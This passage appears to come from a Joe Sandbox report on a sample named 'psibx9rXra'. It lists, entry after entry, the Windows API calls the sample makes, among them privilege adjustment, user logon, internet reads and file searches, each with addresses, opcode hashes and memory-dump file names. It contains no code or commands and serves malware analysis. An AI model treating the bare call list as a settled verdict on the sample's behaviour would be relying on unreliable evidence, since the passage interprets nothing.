                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                • Opcode ID: 26cb619fc3081dc7c3d9a152410dc0c2ad4401a1ef74a917b304fa96d91506d2
                                                • Instruction ID: 986084292907c78751c235f157126b42bcc59143c138fab70b3b28dd2d958211
                                                • Opcode Fuzzy Hash: 26cb619fc3081dc7c3d9a152410dc0c2ad4401a1ef74a917b304fa96d91506d2
                                                • Instruction Fuzzy Hash: 0A322675A007059FDB28DF19C481AAAB7F1FF48320B15C56EE89ADB3A1E770E941DB40
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FF180A,00000000), ref: 00FF23E1
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FF2418
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                • Opcode ID: 84f4e46bf74686fd2441c9b2c61102a7dd98e52244d08da9991cedd2eb4cf660
                                                • Instruction ID: e27f6b681de7f449c39f05eb9819c64db07544f7f84a76cc56df087f5299c62d
                                                • Opcode Fuzzy Hash: 84f4e46bf74686fd2441c9b2c61102a7dd98e52244d08da9991cedd2eb4cf660
                                                • Instruction Fuzzy Hash: EC4104B290420DBFEB60DE95DC81FBFB7ACEF40324F10406AF744A6161DAB99E41B650
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00FEB40B
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FEB465
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FEB4B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                • Opcode ID: 647d1bed7a8f77095aae41b99fa973b2c3f8523c797511862a7d4e59bfbd64c7
                                                • Instruction ID: e40b9871ab59e75d18e2bfd4f36d0ea302cd5a1bcaa3dc3ed93727a1ebc6492a
                                                • Opcode Fuzzy Hash: 647d1bed7a8f77095aae41b99fa973b2c3f8523c797511862a7d4e59bfbd64c7
                                                • Instruction Fuzzy Hash: 7C21AC35A00109EFCB00EFA5DC84AEEBBB8FF49314F1480AAE845EB351CB35A915DB51
                                                APIs
                                                  • Part of subcall function 00FA0DB6: std::exception::exception.LIBCMT ref: 00FA0DEC
                                                  • Part of subcall function 00FA0DB6: __CxxThrowException@8.LIBCMT ref: 00FA0E01
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD882B
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8858
                                                • GetLastError.KERNEL32 ref: 00FD8865
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                • Opcode ID: 5dd5999aa5138fc697dda057631dd59c77d77541226eee33d5670ea082c2351b
                                                • Instruction ID: 3816187d9fafb3ba063388364149d1986d7cbe834862bc31ac866263bcf3ee72
                                                • Opcode Fuzzy Hash: 5dd5999aa5138fc697dda057631dd59c77d77541226eee33d5670ea082c2351b
                                                • Instruction Fuzzy Hash: 3A11B2B2804205AFE728DF54EC85D2BB7FDEB05710B14852EF45593201DF34BC01AB60
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FD8774
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FD878B
                                                • FreeSid.ADVAPI32(?), ref: 00FD879B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                                                • Instruction ID: 9504304aa56d725e857c3ab8e2ed6318de615b1bee9d654c33440cd4a8413810
                                                • Opcode Fuzzy Hash: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                                                • Instruction Fuzzy Hash: F6F04975A1130DBFDF10DFF4DC89AAEBBBCEF08611F1044A9A901E2280E6756A049B50
                                                APIs
                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FE4CB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID: DOWN
                                                • API String ID: 2434400541-711622031
                                                • Opcode ID: 808b34115c07f4d286ecb3e92e947d9976d78a50cc0620e8f9c8ffacb41b36ce
                                                • Instruction ID: 6c4911913704e4ac0144cd8f82dc2d8e6ce569586faeaf68ef1daf7cb77e76ac
                                                • Opcode Fuzzy Hash: 808b34115c07f4d286ecb3e92e947d9976d78a50cc0620e8f9c8ffacb41b36ce
                                                • Instruction Fuzzy Hash: 7CE08C7269D7623CB954291EBC03EF7238C8B13335B20020AF850EA4C1ED896C8275B8
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00FEC6FB
                                                • FindClose.KERNEL32(00000000), ref: 00FEC72B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 5f43e5c05b7d682379bf826b83a162c6d9d5dbcf3a51a60b34e6d92a23892e94
                                                • Instruction ID: 31bff3415e86452b60339730389059a3b808b29d5a5989d56ba2fecf85bba5ec
                                                • Opcode Fuzzy Hash: 5f43e5c05b7d682379bf826b83a162c6d9d5dbcf3a51a60b34e6d92a23892e94
                                                • Instruction Fuzzy Hash: 52118B726042019FDB10EF29D885A6AF7E9EF85324F04851EF9AAC7291DB74A805DB81
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FF9468,?,0100FB84,?), ref: 00FEA097
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FF9468,?,0100FB84,?), ref: 00FEA0A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 42416b613fdbf65db145961db234498655444359f1a1dd9535cd00bae077ad9a
                                                • Instruction ID: 38d472d9cbd3480f86e46675b3610be4fdcd882f422c062df678d3d83923259b
                                                • Opcode Fuzzy Hash: 42416b613fdbf65db145961db234498655444359f1a1dd9535cd00bae077ad9a
                                                • Instruction Fuzzy Hash: 5DF0A73650522DBBDB31AFA5CC48FEA776CFF08361F008155F909D7181DA34AA40DBA1
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8309), ref: 00FD81E0
                                                • CloseHandle.KERNEL32(?,?,00FD8309), ref: 00FD81F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: df2e805b2c209a982c7275a968edee64db199e47a87207975c8776068e9d4a8b
                                                • Instruction ID: 8e5e33e535a541c4cf540c6cd3b91a2446a995e2c2d8c1fa0c73c3459d32e88f
                                                • Opcode Fuzzy Hash: df2e805b2c209a982c7275a968edee64db199e47a87207975c8776068e9d4a8b
                                                • Instruction Fuzzy Hash: 82E0E671010611AFEB362B60FC05D7777EEEF04360B14881DF49584474DB665C91FB10
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FA8D57,?,?,?,00000001), ref: 00FAA15A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FAA163
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                                                • Instruction ID: ba911ee3f23f9caee27f7313bd55e44b60a8e859c6b05a48578a50b6a603392c
                                                • Opcode Fuzzy Hash: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                                                • Instruction Fuzzy Hash: 87B0923105820AABCA222B91E809B883F68EB45AB2F408010F64D84054CBE75450AB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                                                • Instruction ID: df3fe557f179d0cbe64d172361acfdc144707aae98c712211e7eae30caed6e5d
                                                • Opcode Fuzzy Hash: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                                                • Instruction Fuzzy Hash: 3B322372D29F014DD7239534D872336A249AFB73D4F14D737E85AB9AAAEB2DC4835200
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                                                • Instruction ID: 80cd41d532355e0cce1f6c36e495e34aa20c0ab033fb1544937d3f864458aac8
                                                • Opcode Fuzzy Hash: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                                                • Instruction Fuzzy Hash: 06B1F130E2AF808DD72396398831336B65CAFBB2D5F51D71BFC6671D16EB2A85834240
                                                APIs
                                                • __time64.LIBCMT ref: 00FE889B
                                                  • Part of subcall function 00FA520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FE8F6E,00000000,?,?,?,?,00FE911F,00000000,?), ref: 00FA5213
                                                  • Part of subcall function 00FA520A: __aulldiv.LIBCMT ref: 00FA5233
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem__aulldiv__time64
                                                • String ID:
                                                • API String ID: 2893107130-0
                                                • Opcode ID: 31766b4fe123a399a86e6322b8bd62a1a67ebe01e442e1e449380e3651e5774a
                                                • Instruction ID: 1851f7627a5f508ab5b912c27629c816ee3e897589398a47bf0d11702b67ce0c
                                                • Opcode Fuzzy Hash: 31766b4fe123a399a86e6322b8bd62a1a67ebe01e442e1e449380e3651e5774a
                                                • Instruction Fuzzy Hash: 5321E476A355108BC329CF25D481B52B3E1EFA5320F288E6CD4F9CB2C0CA35B905DB94
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FD8389), ref: 00FD87D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                                                • Instruction ID: d5db774f1666c6f62323c3dd4bfd4c7f6edbeb51ab8a456ad5ae6c28cd0376f8
                                                • Opcode Fuzzy Hash: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                                                • Instruction Fuzzy Hash: 97D05E3226090EABEF11CEA4DC01EAF3B69EB04B01F408111FE15C5090C776D835AF60
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FAA12A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                                                • Instruction ID: 4fc1d08d65833745488d82020a48d1e715a3b5c71e5db6a99c1634bf9c5daa6f
                                                • Opcode Fuzzy Hash: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                                                • Instruction Fuzzy Hash: 75A0123000410DA78A111B41E8044447F5CD6001A0B008010F40C4001187B354105680
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02b1d0696fd80e03ebd00f059a1708462bc4eec3e852786ffa55867eef5ad943
                                                • Instruction ID: 6be6d5da18cf3e24f5a32d53aa98ef76a336b22c195fba1203394c492cbe5196
                                                • Opcode Fuzzy Hash: 02b1d0696fd80e03ebd00f059a1708462bc4eec3e852786ffa55867eef5ad943
                                                • Instruction Fuzzy Hash: FA223631D041469BEF388A64C49477C77A2FB027A4F28806BD586CB692DB39DD83FB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 622567f720e86ad04802eb6c2630e08b7add416f8ec28c444591822b9ec1b769
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: B5C1A5B27051A30ADF6D863D843413EFAA16FA37B131A075DD8B3DB1D5EE20D925E620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
